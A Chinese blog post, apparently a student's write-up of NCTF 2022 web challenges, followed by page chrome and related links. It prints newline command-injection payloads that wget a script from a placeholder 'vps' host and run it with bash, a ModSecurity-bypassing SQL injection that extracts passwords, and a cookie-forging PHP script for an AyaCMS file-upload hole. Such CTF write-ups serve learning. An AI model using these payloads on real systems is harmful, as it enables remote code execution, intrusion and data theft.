NCTF web总结与复现

最新推荐文章于 2022-12-08 12:15:00 发布
最新推荐文章于 2022-12-08 12:15:00 发布
阅读量795 收藏 1
点赞数 1
分类专栏: 比赛 文章标签: php 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/128193295
版权

前言

打完NCTF休息了一下,总体感觉还行,学到了很多。

calc

这一题也卡了我很久,因为复现过DASCTF三月赛,一直在想着有没有可以替代反引号或绕过的方法,搞了好久都没出,在学长的提示下学到了一个方法,利用wget命令将自己的恶意脚本传到服务器上,然后再用bash命令调用。

有了这个提示后一直在尝试如何下载成功,但脚本中是这样的形式。

image-20221205193511587

可以在自己的虚拟机试一下,有了echo后无法直接echo wget xxx这样来下载。

如果仅仅以字符串直接传进去

'wget''%09''http://vps/feng123.sh'

会发现其会回显,然后也会传进log.txt中

wget http://vps/feng123.sh

在这里插入图片描述

也就是执行了echo wget xxx > ./tpm/log.txt这条命令,但是并不会将wget xxx当成命令来执行,只会将其当成echo命令的参数,而反引号和$()都被过滤,这时就要用到%0A了,换行符。

当我们将上边的命令左右两边加上%0a

%0A'wget'%09'http://vps/feng123.sh'%0A

image-20221205195243737

发现成功下载恶意脚本,这里思考一下为何会这样:

python调试不太会,只能自己稍微分析一下。

当加上换行符时:

命令执行后并不会在log.txt中留下痕迹,猜测一下,换行符其实是把之前一整个命令拆开,分成了两段。

先把过滤给去掉,然后还需要设计闭合一下前后代码防止其抛出异常。

'''1'%0Aecho `ls`> ./tmp/log2.txt%0A'ls'''

在这里插入图片描述

发现自己加进去那一条echo代码确实执行了,并且会发现前边那一条echo命令也执行成功了。

image-20221205201311687

然后继续尝试三段代码同时成功:(将主代码中的log.txt改为logs.txt)

'''2'%0Aecho `ls`> ./tmp/log2.txt%0A'echo'''

在这里插入图片描述

image-20221205201957499
在这里插入图片描述

三串代码全部执行,说明我的想法是没错的,接下来就可以直接远程下载恶意脚本,然后bash执行。

payload:

?num=%0A'wget'%09'http://vps/test.sh'%0A
?num=%0A'bash'%09'test.sh'%0A

ezbypass

第二个是一个sql注入绕过,hint提示waf是modsecurity,直接上网搜索sql modsecurity bypass。

SQLi bypass at PL1(CRS 3.2.0) · Issue #1727 · SpiderLabs/owasp-modsecurity-crs (github.com)

找到了绕过方法,然后就找password即可,因为题目直接给出了所在表,直接select查询即,本来我是直接查的是flag,但发现显示不存在,后边发现提示找password,所以找password字段即可。

payload:

?id=@.:=right(right((select%20hex(password)%20from%20users.info),1111),1111)%20union%23%0adistinctrow%0bselect@.

得到password后hex转码就是flag。

ez_php

在install.php中得到了版本为v3.1.2,然后在网上找到了相应的文件上传漏洞,但是还需要管理员密码,尝试爆破未成功。

然后就是伪造cookie,网上的脚本。

<?php
function random($length=4,$chars='abcdefghijklmnopqrstuvwxyz'){
	$hash='';
	$max=strlen($chars)-1;
	for($i=0;$i<$length;$i++)
		{
			$hash.=$chars[mt_rand(0,$max)];
		}
		return $hash;
	}
	function encrypt($txt,$key=''){
		$key or $key=AYA_KEY;
		$rnd=random(32);
		$len=strlen($txt);
		$ctr=0;
		$str='';
		for($i=0;$i<$len;$i++){
			$ctr=$ctr==32?0:$ctr;
			$str.=$rnd[$ctr].($txt[$i]^$rnd[$ctr++]);
		}
		return str_replace('=','',base64_encode(kecrypt($str,$key)));
	}
	function kecrypt($txt,$key){
		$key=md5($key);
		$len=strlen($txt);
		$ctr=0;
		$str='';
		for($i=0;$i<$len;$i++){
			$ctr=$ctr==32?0:$ctr;
			$str.=$txt[$i]^$key[$ctr++];
		}
		return $str;
	}

echo encrypt("../module/admin/fst_upload", 'aaa');

然后利用漏洞文件上传。

AyaCMS v3.1.2 has a Frontend Arbitrary File Upload Vulnerability · Issue #4 · loadream/AyaCMS (github.com)

ez_sql

这一题很无语,找到了类似的题,但并不理解。

Hack. lu CTF 2022 筆記 - Huli

结束后看了其他师傅们的payload:

?id=1&?=`in%20()%20union%20select%201,flag%20from%20flag;

看来找对地方也不一定能看懂人家的讲解,太fw了。

f0njl
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
NCTF 南京邮电大学网络攻防训练平台 WriteUp
Ni9htMar3的博客
12-21 2万+
WEB 签到题1 md5 collision 签到题2 这题不是WEB 层层递进 AAencode 单身二十年 你从哪里来 php decode 文件包含 单身一百年也没有用 Download~! COOKIE MYSQL sql injection 3 /x00 bypass again 变量覆盖 PHP是世界上最好的语言 伪装者 Header 上传绕过 SQL注入1 pass chack 起名字很难 密码重置 p
[NCTF2022]calc学习
Aiwin的博客
04-01 590
[NCTF2022]calc学习
NCTF2022 Web Writeup
渗透测试研究中心
12-08 669
1.calc 题目地址:http://116.205.139.166:8001/ 右键 /source 源码 @app.route("/calc",methods=['GET']) def calc(): ip = request.remote_addr num = request.values.get("num") log = "echo {0}{1}{2}> ...
nctf-web
电风
03-30 2403
1:你从哪里来 你是从 google 来的吗? http://115.28.150.176/referer/index.php BP截包 看到referer这里修改如下 Repeater->go 返回flag,网页显示如下: 2单身一百年也没用 传送门:biu~ http://chinalover.sinaapp.com/web9/ 题目提示到这里找KEY,点击KEY链接, 显示
nctf-/x00
电风
05-06 1395
1.http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php if (isset ($_GET['nctf'])) { if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE) echo '必须输入数字才行'; e
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
2018 南邮 NCTF writeup(部分)更新中---
筱阳的博客
11-27 2395
2018 南邮 NCTF writeup 周六的打南邮的比赛,做了一道签到题,接着是一道SQL注入,想了一上午,最终还是没有做出来,怪自己喜欢用sqlmap,加上自己做的sql注入题目少 签到题 点击链接直接跳转到百度了,用burpsoup重放一遍就OK了 滴!晨跑打卡 通过用burpsoup的sql fuzz测试了一下 发注释了 空格 # - * 将注释全都过滤了,只能用单引号闭合 绕过...
NCTF2020 你就是我的master吗
feng的博客
11-22 742
前言 第一次参加南邮的NCTF,表示题目出的质量很好,出题人也很好,平台也很好,交flag也不需要验证码(逃~),总的来说就是好,明年还会参加。 见证了过了1天PWN仍然0解的状况,南邮的PWN还是强啊。 总榜第一的大师傅还是强啊,但是为什么是梅子酒不是郁离歌呢?(逃~): Web题目的质量还是挺高的,虽然我不会。。。今年只能做出来最简单的那道SSTI,争取明年能再创新高。。 WP F12看源码,发了?name=master,url传一下发回显了,大概率是SSTI,经过测试是Jinja2的SSTI,然
NCTF2018部分题WP(2)
单核CPU的小朋友的博客
11-27 3万+
第一题:滴!晨跑打卡 这道题过滤了空格,但是可以使用url编码来绕过,这里我们可以使用%a0,也就是加号来绕过。 首先查列数: 编码:1%27%a0union%a0select%a01,2,3%27# 很明显可以查出是三列。 然后就是查数据库名: 编码:id=1%27%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(SCHEMA_NAME)%a0FROM%...
南邮-NCTF2022 WRITE UP
toto的博客
12-05 1424
nctfwp
南邮CTF练习题——web
热门推荐
dcison的博客
11-11 4万+
南邮CTF部分题解
NCTF 2019 Re Writeup(四题)
siphre
11-25 896
reverse 一、DEBUG ELF动态调试,flag长度24字节,用户输入的字符串跟经过处理后的字符串s做校验。因为变量s是经过处理的,得在cmp dl,al下断看eax寄存器的值,可以看到最终比较的时候s的值。 手抄s的值出来,再python翻译成字符串即可。 flag=[0x4E,0x43,0x54,0x46,0x7b,0x6a,0x75,0x73,0x74,0x5f,0x6...
NCTF 2018部分WP(3)
单核CPU的小朋友的博客
11-27 3万+
WEB-基本操作 这道题是郁离歌学姐出的,基本操作。一进去就是一个PHPMyAdmin的页面。直接右击查看网页源代码。 这道题本身也好像是在想方设法的告诉我们这个MYSQL的版本是4.8.1。 一个一个尝试账号密码==猜了半天最后还是某位大佬告诉我这个账号密码都是guest。。。 然后就开始尝试PHPMyadmin的本地文件包含漏洞,希望能够找到flag文件。 首先要知道在URL编码中%3f是用...
NCTF 2018 部分题目 WP(1)
单核CPU的小朋友的博客
11-25 3万+
WEB-签到题:直接看cookie就好了,直接拿到flag RE-后门后门后门: 下载一个64位的.exe程序,ida直接打开,观察main函数,发函数hereisyourflag(void),发数组变量flagenc,转成char型。 直接拿到flag。 3.PWN-sendflag: IDA打开,很明显溢出了。 直接发送六个a拿到flag。 4.MISC-CalcNow: NC连...
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值